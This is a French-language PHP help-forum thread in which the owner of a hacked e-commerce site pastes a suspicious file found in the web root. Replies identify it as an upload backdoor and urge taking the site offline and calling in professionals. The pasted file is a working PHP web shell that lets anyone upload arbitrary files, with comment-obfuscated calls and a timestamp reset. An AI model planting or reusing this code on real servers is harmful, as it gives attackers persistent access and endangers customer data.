Forum d'entraide PHPFrance

Bonjour j'ai un site ecommerce qui c'est fait pirater en autre des fichiers apparaissent dans la racine du www.
Je ne connais rien au Php. je cherche la ou les backdoor. un fichier me semble douteux
voici son contenu
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">

<title>utf</title>

</head>

<body>

<?php

print "<h1>#p@$c@#</h1>\n";

echo "Your IP: ";

echo $_SERVER['REMOTE_ADDR'];

echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";

echo "<input type=\"file\" name=\"filename\"><br> \n";

echo "<input type=\"submit\" value=\"LOAD\"><br>\n";

echo "</form>\n";

if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))

{

move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);

$file = $_FILES/*;*/["filename"]["name"];

echo "<a href=\"$file\">$file</a>";

} else {

echo("empty");

}

$filename = $_SERVER[SCRIPT_FILENAME];

touch/*;*/($filename, $time);

?>

</body>

</html>


merci d'avance pour vos lumieres

un script qui permet d'uploader des fichiers, donc continuer de faire ce qu'il veux plus facilement sur le serveur.
à supprimer, mais surtout trouver la faille qui a permis de mettre ce fichier sur le serveur.

Je ne connais rien au Php. je cherche la ou les backdoor.

Fait appel à un professionnel, parce que si tu n'y connais rien, tu n'arriveras jamais à trouver la faille et encore moins à la corriger.

Sachant qu'en plus ton site est un site de e-commerce, cela veut dire que tu as probablement les données de tes clients qui sont potentiellement aux mains de hackers donc il est urgent :
1) de mettre immédiatement hors-ligne ton site
2) de faire appel à une société dont c'est le métier pour qu'elle analyse le problème, évalue l'ampleur du piratage et mette en place les actions correctives.